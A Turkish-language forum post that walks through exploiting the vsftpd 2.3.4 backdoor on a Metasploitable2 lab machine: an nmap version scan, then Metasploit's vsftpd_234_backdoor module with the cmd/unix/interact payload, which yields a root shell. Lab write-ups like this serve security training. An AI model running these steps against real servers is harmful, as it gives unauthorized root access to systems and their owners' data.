FTP Sunucu Hackleme (NMAP)

Kirito1337

Gezgin
Revealed content
Bu konuda, FTP protokolü üzerinde ki "vsftpd 2.3.4" uygulamasını exploit ederek hedef sistemde root yetkisine çıkmayı göstereceğim.

Sızma Testi senaryosunu gerçekleştirirken, laborotatuvar ortamı olarak, "métasploitable2-Linux" sistemini kullandım.

Artık anlatıma geçelim.

Öncelikle hedef sunucumuzda bir nmap ile port taraması yaparak keşif çalışmamızı yapalım.

"nmap -sV 192.168.127.130" hedef sunucumuzun İP adresidir.


Tarama sonucunda gördüğünüz gibi, FTP protokolü üzerinde, "vsftpd 2.3.4" uygulaması çalışmakta.

Biz de bunu kullanarak hedef sunucuya sızabiliriz.

Açalım bakalım, métasploit framework’ ümüzü

"msfconsole" diyerek açıyoruz.


search vsftpd" komutunu girerek explotimizi aradık.

"use exploit/unix/ftp/vsftpd_234_backdoor" exploitimize giriyoruz.

"show payloads" komutu ile exploite uygun payloadları arıyoruz ve "cmd/unix/interact" payloadını seçiyoruz.


ardından, "show options" komutunu girerek, genel ayarları yapıyoruz.

"set RHOST 192.168.127.130" ve "set RPORT 21" bilgilerini girerek exploiti çalıştırıyoruz.


exploit sonucunda, hedef sistemde root yetkisi kazanmış olduk.

UID: uid=0(root) gid=0(root)

görüldüğü üzere, "command shell session 1 opened" 1 shell oturumu açıldı. Artık linux komutlarıı çalıştırabiliriz. Gerisi
size kalmış.

"whoami" komutunu girdim, "root" çıktısını aldım. Bu demek oluyorki sen root kullanıcısısın artık.

"uname -a" komutu ile hedef sistemin kernel sürümünü öğrendim.

"ls" komutu ile bulunduğum dizinin dosyalarını listeledim. Ve çok şey yapabiliriz.
SON ;)
 
Top